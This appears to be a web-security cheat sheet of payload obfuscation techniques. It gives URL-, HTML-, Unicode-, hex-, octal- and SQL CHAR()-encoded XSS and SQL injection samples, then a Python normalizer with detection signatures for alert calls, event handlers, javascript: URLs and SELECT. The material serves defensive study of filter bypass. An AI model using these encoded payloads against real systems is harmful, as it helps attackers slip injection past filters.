# Obfuscation

**URL encoding:**

```bash
[...]/?search=Fish+%26+Chips
```

**Double URL encoding:**

```bash
[...]/?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
```

**HTML encoding:**

```html
<img src=x onerror="&#x61;lert(1)">
<a href="javascript&#00000000000058;alert(1)">Click me</a>
```

**XML encoding:**

```xml
<stockCheck>
    <productId>
        123
    </productId>
    <storeId>
        999 &#x53;ELECT * FROM information_schema.tables
    </storeId>
</stockCheck>
```

**Unicode encoding:**

```js
eval("\u0061lert(1)")
<a href="javascript\u{0000000003a}alert(1)">Click me</a>
```

**Hex escaping:**

```js
eval("\x61lert")
```

**Octal escaping:**

```js
eval("\141lert(1)")
```

**Multiple encodings:**

```js
<a href="javascript:&bsol;u0061lert(1)">Click me</a>
```

The browser first HTML-decodes `&bsol;` to `\`, turning `u0061` into the Unicode escape `\u0061`, which the JavaScript engine then decodes to `a`.

**SQL char() function:**

```sql
CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
```

This decodes to `SELECT`.
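A filter that matches signatures only against the raw input misses every encoding above. The check below, an added example that is not part of the original page, peels the URL, HTML-entity, JavaScript-escape and `CHAR()` layers to a fixed point before matching, so a signature sees the canonical text; `SAMPLES` are constructed from the encodings listed on this page and `normalize` returns the canonical text together with the number of decoding rounds that changed it.

```python
import html
import re
from urllib.parse import unquote

# JavaScript string escapes from the page: \u{...}, \uXXXX, \xXX and octal \NNN.
JS_ESCAPE = re.compile(r"\\u\{([0-9a-fA-F]+)\}|\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})")
# T-SQL style CHAR(n)+CHAR(n) concatenation; the '+' joining two terms is absorbed.
SQL_CHAR = re.compile(r"CHAR\((\d{1,3})\)(?:\s*\+\s*(?=CHAR\())?", re.IGNORECASE)

def decode_js_escapes(text: str) -> str:
    """Resolve JS escapes to the characters they denote (leading zeros ignored)."""
    def repl(m: re.Match) -> str:
        digits = next(g for g in m.groups() if g is not None)
        codepoint = int(digits, 8 if m.group(4) else 16)
        # \u{...} beyond U+10FFFF is not a valid escape: leave it as written.
        return chr(codepoint) if codepoint <= 0x10FFFF else m.group(0)
    return JS_ESCAPE.sub(repl, text)

def decode_sql_char(text: str) -> str:
    return SQL_CHAR.sub(lambda m: chr(int(m.group(1))), text)

def normalize(value: str, max_rounds: int = 5) -> tuple[str, int]:
    """Peel URL, HTML-entity, JS-escape and CHAR() layers until a fixed point."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = decode_sql_char(decode_js_escapes(html.unescape(unquote(value))))
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

# Signatures a naive filter would run against the raw input.
SIGNATURES = {
    "js-alert": re.compile(r"alert\s*\(", re.I),
    "event-handler": re.compile(r"\bon\w+\s*=", re.I),
    "js-scheme": re.compile(r"javascript\s*:", re.I),
    "sql-select": re.compile(r"\bselect\b", re.I),
}

def find_signatures(text: str) -> list[str]:
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

# Constructed inputs, built from the encodings listed above.
SAMPLES = {
    "double-url": "%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E",
    "html-href": '<a href="javascript&#00000000000058;alert(1)">Click me</a>',
    "mixed": '<a href="javascript:&bsol;u0061lert(1)">Click me</a>',
    "octal": r'eval("\141lert(1)")',
    "sql-char": "CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84) * FROM t",
}
```

Compare `find_signatures(raw)` with `find_signatures(normalize(raw)[0])` for each sample to see which layers hide a match from the raw check. The decoder should mirror the decoding order of the component that actually consumes the input; decoding layers the consumer never applies (for example HTML entities in a field that is never rendered as HTML) produces false positives.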
